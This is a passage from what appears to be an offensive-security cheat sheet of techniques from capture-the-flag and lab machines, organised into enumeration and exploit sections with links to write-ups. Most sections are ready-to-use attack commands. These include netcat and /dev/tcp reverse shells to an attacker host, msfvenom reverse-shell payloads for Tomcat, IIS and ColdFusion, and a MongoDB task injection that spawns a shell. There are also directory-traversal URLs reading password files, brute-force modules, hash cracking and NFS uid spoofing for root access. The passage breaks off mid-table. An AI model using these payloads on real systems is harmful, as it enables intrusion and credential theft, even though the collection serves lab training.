enumerate_proto_sql_ssis_dtsconfig [⇡](#enumerate) The `.dtsConfig` files are used by [SQL Server Integration Services (SSIS)](https://en.wikipedia.org/wiki/SQL_Server_Integration_Services) and can contain plaintext credentials for SQL users. ```shell cat *.dtsConfig ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_ssh"></a> #### enumerate_proto_ssh [⇡](#enumerate) ```shell authorized_keys: ssh-keygen -t rsa -b 2048 enter a custom filename copy contents of <filename>.pub to /home/<username>/.ssh/authorized_keys ssh -i <filename>.pub <username>@<targetip> ssh enum: msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 10.11.1.0/24 msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt msf auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 254 msf auxiliary(scanner/ssh/ssh_enumusers) > run ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_telnet"></a> #### enumerate_proto_telnet [⇡](#enumerate) ```shell nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s <targetip> use auxiliary/scanner/telnet/telnet_version msf auxiliary(telnet_version) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_version) > set THREADS 254 msf auxiliary(telnet_version) > run use auxiliary/scanner/telnet/telnet_login msf auxiliary(telnet_login) > set BLANK_PASSWORDS false msf auxiliary(telnet_login) > set PASS_FILE passwords.txt msf auxiliary(telnet_login) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_login) > set THREADS 254 msf auxiliary(telnet_login) > set USER_FILE users.txt msf auxiliary(telnet_login) > set VERBOSE false msf auxiliary(telnet_login) > run ``` --- <a name="enumerate_proto_webdav"></a> #### enumerate_proto_webdav [⇡](#enumerate) ```shell default pass for xampp: wampp/xampp test uploading different file extensions: davtest -url http://10.11.1.10 test uploading different file extensions, with given creds: davtest -url http://10.11.1.10 -auth username:password remove files uploaded during test: davtest -cleanup create a reverse shell (asp file even if not allowed) connect to webdav share, bypass upload restrictions: cadaver http://10.11.1.10 mkdir temp cd temp put revshell.asp revshell.txt copy revshell.txt revshell.asp open nc to catch reverse shell connection browse webdav share and open uploaded file ``` --- <a name="exploit"></a> ### ⚙️ Exploit [🡑](#ttps) <a name="exploit_apache_tomcat"></a> #### exploit_apache_tomcat [⇡](#exploit) leverage Tomcat Web Application Manager to deploy a malicious .war file that spawns a reverse shell ```shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f war >backdoor.war # deploy war file through tomcat manager # start netcat listener and visit the link for uploaded jsp file to trigger webshell jar -xvf backdoor.war http://<targetip>:<targetport>/<.war filename w/o extension>/<.jsp filename in war archive w/ extension> ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="exploit_bash_reverseshell"></a> #### exploit_bash_reverseshell [⇡](#exploit) spawn a bash reverse shell to gain interactive access on the target system ```shell nc -nlvp <attackerport> rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attackerip> <attackerport> >/tmp/f ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="exploit_bof"></a> #### exploit_bof [⇡](#exploit) create a bof exploit to execute arbitrary code and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_cloudme_bof"></a> #### exploit_cloudme_bof [⇡](#exploit) the CloudMe version 1.11.12 is vulnerable to a buffer overflow that could be used to gain interactive access on the target system, possibly with elevated privileges ```shell msfvenom -p windows/shell_reverse_tcp lhost=<attackerip> lport=<attackerport> -b "\x00\x0a\x0d" -f python -a x86 --platform windows -e x86/shikata_ga_nai sudo nc -nlvp <attackerport> python 48389.py ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48389 --- <a name="exploit_cmdexec"></a> #### exploit_cmdexec [⇡](#exploit) execute arbitrary commands via a command execution vulnerability and gain interactive access on the target system ```shell nc -nlvp <attackerport> bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_coldfusion_dirtraversal"></a> #### exploit_coldfusion_dirtraversal [⇡](#exploit) coldfusion 8 is vulnerable to a directory traversal and exposes SHA1 hash of the user password ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://www.exploit-db.com/exploits/14641 --- <a name="exploit_coldfusion_scheduledtasks"></a> #### exploit_coldfusion_scheduledtasks [⇡](#exploit) coldfusion 8 allows to obtain remote shell by creating and executing a new scheduled task. this is a post-authentication vulnerability ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm http://<targetip>:<targetport>/CFIDE/administrator/settings/mappings.cfm # check the CFIDE logical path mapping to identify the file upload location, C:\ColdFusion8\wwwroot\CFIDE msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f raw >revshell.jsp nc -nlvp <attackerport> http://<targetip>:<targetport>/CFIDE/administrator/scheduler/scheduletasks.cfm # set url to revshell.jsp link # mark the save output to file option # set file to C:\ColdFusion8\wwwroot\CFIDE\revshell.jsp # run the scheduled task on demand to upload the revshell.jsp file http://<targetip>:<targetport>/CFIDE/revshell.jsp ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="exploit_command_injection"></a> #### exploit_command_injection [⇡](#exploit) certain webapps couldbe vulebrable to command injection via input text fields ```shell # submit escaped input: "\";whoami\n" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="exploit_credsreuse"></a> #### exploit_credsreuse [⇡](#exploit) Reuse credentials already found for a service to interact with another service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 5. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="exploit_defaultcreds"></a> #### exploit_defaultcreds [⇡](#exploit) Use default credentials to interact with a service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_drupal_passwordcrack"></a> #### exploit_drupal_passwordcrack [⇡](#exploit) Crack a drupal password hash ```shell hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt --force ``` [+] https://0xdf.gitlab.io/2019/03/12/htb-bastard.html --- <a name="exploit_ftp_anonymous"></a> #### exploit_ftp_anonymous [⇡](#exploit) Interact with the ftp service using `anonymous/any` credentials | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_ftp_web_root"></a> #### exploit_ftp_web_root [⇡](#exploit) FTP server's root directory is mapped to the web server's root directory. Upload a reverse shell file native to the web server using ftp server (`anonymous` login or default creds or creds reuse or some exploit) and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_gpp_groupsxml"></a> #### exploit_gpp_groupsxml [⇡](#exploit) the Groups.xml file lists username and encrypted password that can be useful to gain initial access on the target system. access this file via an open ftp/smb share or some other method ```shell smbclient //10.10.10.100/Replication get ..\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml Groups.xml exit cat Groups.xml gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" smbclient //10.10.10.100/Users -U SVC_TGS ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://adsecurity.org/?p=2288 --- <a name="exploit_gymsystem_rce"></a> #### exploit_gymsystem_rce [⇡](#exploit) use `/contacts.php` to confirm the version is 1.0 and fire this exploit to get a pseudo-interactive shell on the target machine. you can ```shell python 48506.py http://<targetip>:<targetport>/ curl "http://<targetip>:<targetport>/upload/kamehameha.php?telepathy=whoami" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48506 --- <a name="exploit_hfs_cmd_exec"></a> #### exploit_hfs_cmd_exec [⇡](#exploit) HFS (`HttpFileServer 2.3.x`) is vulnerable to remote command execution ```shell python 39161.py <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | [+] https://www.exploit-db.com/exploits/39161 [+] https://nvd.nist.gov/vuln/detail/CVE-2014-6287 --- <a name="exploit_iis_asp_reverseshell"></a> #### exploit_iis_asp_reverseshell [⇡](#exploit) use an `asp`|`aspx` reverse shell to gain interactive access on the target system. useful when Microsoft IIS server is found during enumeration. might need a separate vulnerability to upload the reverse shell file on target system (use burp to bypass filename filter - revshell.aspx%00.jpg) ```shell msfvenom -p windows/shell/reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f asp >rs.asp msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f aspx >rs.aspx ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#kali-aspx-shells --- <a name="exploit_iis_webdav"></a> #### exploit_iis_webdav [⇡](#exploit) multiple iis webdav issues. can use msf exploits `windows/iis/iis_webdav_scstoragepathfromurl` or `windows/iis/iis_webdav_upload_asp` to gain interactive access on the target system ```shell msfconsole use windows/iis/iis_webdav_scstoragepathfromurl set rhost <targetip> set rport <targetport> show options exploit use windows/iis/iis_webdav_upload_asp set rhost <targetip> set rport <targetport> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 2. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp --- <a name="exploit_lotuscms"></a> #### exploit_lotuscms [⇡](#exploit) LotusCMS is vulnerable to remote code execution ```shell nc -nlvp <attackerport> ./lotusRCE.sh <targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | [+] https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh --- <a name="exploit_modssl"></a> #### exploit_modssl [⇡](#exploit) Apache `mod_ssl < 2.8.7` is vulnerable to remote code execution ```shell gcc -o 47080 47080.c -lcrypto ./47080 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2 ./47080 0x6b <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | [+] https://www.exploit-db.com/exploits/47080 [+] https://nvd.nist.gov/vuln/detail/CVE-2002-0082 --- <a name="exploit_mongodb"></a> #### exploit_mongodb [⇡](#exploit) ```shell nc -nlvp <attackerport> mongo -p -u <user> <record> db.tasks.insert({"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> <attackerport> >/tmp/f"}) bye ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nfs_rw"></a> #### exploit_nfs_rw [⇡](#exploit) when an open nfs share is found, look for available mountpoints, mount using `nfsv3` so that we can see the real remote `uid` and `gid`, create a new user with expected `uid`, switch user, create the `.ssh` directory, copy `id_rsa.pub` to this directory and ssh to gain interactive access on the target system ```shell check available mountpoints mount file system via nfs v3 check uid of user create a new local user with nfs user's uid change to new user copy ssh public key to .ssh/authorized_keys file ssh into the target as user copy root owned copy of bash from local system to nfs mount running "./bash -p" gives root access as euid is carried over during copy operation mount nfsv3, create new user with nfs user uid and get root shell unmount and remove temporary user: showmount -e <targetip> mkdir /tmp/nfs mount <targetip>:/home/vulnix /tmp/nfs -o vers=3 # nfs v3 allows listing of user ids for shared files ls -l /tmp/nfs # check the uid and use it to create new user useradd -u 2008 vulnix su vulnix copy ~/.ssh/id_rsa.pub to ~/.ssh/authorized_keys on target host to gain passwordless ssh access umount /tmp/nfs ; userdel vulnix showmount -e <targetip> Export list for <targetip>: /home/vulnix * mkdir ./mnt/ mount <targetip>:/home/vulnix ./mnt -o vers=3 ls -l groupadd --gid 2008 vulnix ; useradd --uid 2008 --groups vulnix vulnix cp ~/.ssh/id_rsa.pub ./authorized_keys su vulnix cd ./mnt/ mkdir .ssh/ cp ./authorized_keys ./.ssh/ exit ssh vulnix@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | [+] https://blog.christophetd.fr/write-up-vulnix/ --- <a name="exploit_nodejs"></a> #### exploit_nodejs [⇡](#exploit) inspect source for `assets/js/app/controllers/*.js` files and look for rest api calls that could leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nodejs_deserialize"></a> #### exploit_nodejs_deserialize [⇡](#exploit) user input is passed to `unserialize()` method that could allow remote code execution [+] https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup/ [+] https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py [+] https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py [+] https://0xdf.gitlab.io/2018/08/25/htb-celestial.html --- <a name="exploit_pchart"></a> #### exploit_pchart [⇡](#exploit) the `pChart 2.1.3` web application is vulnerable to directory traversal ```shell http://<targetip>/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 